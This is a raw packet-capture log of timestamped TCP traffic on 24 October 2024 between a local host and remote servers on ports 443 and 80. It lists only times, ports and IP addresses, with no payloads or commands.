                                                                                    Oct 24, 2024 08:45:22.450465918 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:22.450607061 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:22.521857977 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:22.521908998 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.642343998 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.642478943 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.648199081 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.648231983 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.648561954 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.648632050 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.729605913 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.775348902 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.981192112 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.981290102 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.981306076 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.981352091 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.981409073 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.981468916 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.982858896 CEST49163443192.168.2.225.159.62.244
                                                                                    Oct 24, 2024 08:45:23.982872009 CEST443491635.159.62.244192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.992266893 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:23.997737885 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:23.997911930 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:23.997997999 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.003621101 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692682028 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692734003 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692785025 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692820072 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692852974 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692886114 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692894936 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.692894936 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.692894936 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.692894936 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.692894936 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.692922115 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692953110 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.692964077 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.692970991 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.693002939 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.693023920 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.693046093 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.693054914 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.693098068 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.698542118 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.698579073 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.698611975 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.698652029 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.719336987 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.809485912 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809513092 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809530973 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809547901 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809643984 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.809680939 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.809740067 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809756994 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809783936 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809794903 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.809799910 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809817076 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.809825897 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.809856892 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.809895039 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.810731888 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.810760975 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.810775995 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.810791969 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.810792923 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.810808897 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.810832977 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.810859919 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.811713934 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.811732054 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.811760902 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.811775923 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.811775923 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.811795950 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.811809063 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.811839104 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.812671900 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.812689066 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.812711954 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.812736034 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.812769890 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.815007925 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.815078974 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.815092087 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.815148115 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926467896 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926501989 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926521063 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926537037 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926553011 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926568985 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926597118 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926681995 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926683903 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926683903 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926683903 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926683903 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926685095 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926685095 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926698923 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926718950 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926805973 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926805973 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926805973 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.926968098 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.926985979 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927038908 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927038908 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927082062 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927110910 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927138090 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927140951 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927155972 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927165985 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927172899 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927187920 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927192926 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927210093 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927249908 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927249908 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927700043 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927705050 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927715063 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927730083 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.927778959 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.927810907 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928107977 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928124905 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928139925 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928154945 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928164959 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928181887 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928189039 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928200006 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928210020 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928217888 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928231001 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928236961 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928248882 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928255081 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928268909 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928275108 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928287029 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928308010 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928327084 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928921938 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928937912 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928965092 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928978920 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.928987026 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.928998947 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.929014921 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.929017067 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:24.929014921 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.929044008 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:24.929059029 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:25.143767118 CEST8049164192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:25.144052982 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:25.258419037 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:25.258462906 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:25.258543015 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:25.271605015 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:25.271686077 CEST4916480192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:25.287599087 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:25.287616968 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.398242950 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.398583889 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.403203011 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.403217077 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.403490067 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.403542042 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.465584993 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.507333040 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.716754913 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.716814041 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.716840982 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.716857910 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.716878891 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.716895103 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.718476057 CEST49165443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:26.718499899 CEST443491655.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.729583979 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:26.735001087 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:26.735052109 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:26.735239983 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:26.740586996 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389779091 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389837980 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389848948 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.389883041 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.389909029 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389930010 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389967918 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389977932 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.389986992 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.389997005 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.390022993 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.390039921 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.390041113 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.390058994 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.390059948 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.390081882 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.390083075 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.390110016 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.390127897 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.395416021 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.395471096 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.397980928 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.505485058 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505527020 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505536079 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505552053 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505563021 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.505597115 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.505597115 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.505805969 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505831003 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505840063 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505855083 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505856037 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.505863905 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.505871058 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.505897999 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.506679058 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.506726027 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.506728888 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.506735086 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.506762028 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.506767988 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.506771088 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.506808996 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.507662058 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.507678032 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.507687092 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.507704973 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.507714987 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.507719994 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.507729053 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.507744074 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.507754087 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.508605003 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.508632898 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.508646011 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.508671999 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.510895967 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.510925055 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.510948896 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.510973930 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.511096001 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.511117935 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.511138916 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.511162996 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621551991 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621623039 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621645927 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621682882 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621701956 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621735096 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621776104 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621793985 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621812105 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621809006 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621809006 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621809959 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621829987 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621850014 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.621901035 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621901035 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621901035 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.621901035 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622071981 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622138023 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622180939 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622205973 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622247934 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622270107 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622288942 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622330904 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622549057 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622575045 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622603893 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622618914 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622626066 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622637033 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622673035 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622688055 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.622694016 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.622742891 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623085976 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623126984 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623169899 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623183012 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623209953 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623245001 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623260021 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623279095 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623296976 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623301029 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623341084 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623347044 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623347044 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623373032 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623384953 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623393059 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623428106 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.623454094 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.623539925 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.624013901 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.624103069 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.624142885 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.624176979 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.624195099 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.624197960 CEST4916680192.168.2.22192.3.176.141
                                                                                    Oct 24, 2024 08:45:27.624212980 CEST8049166192.3.176.141192.168.2.22
                                                                                    Oct 24, 2024 08:45:27.624245882 CEST8049166192.3.176.141192.168.2.22
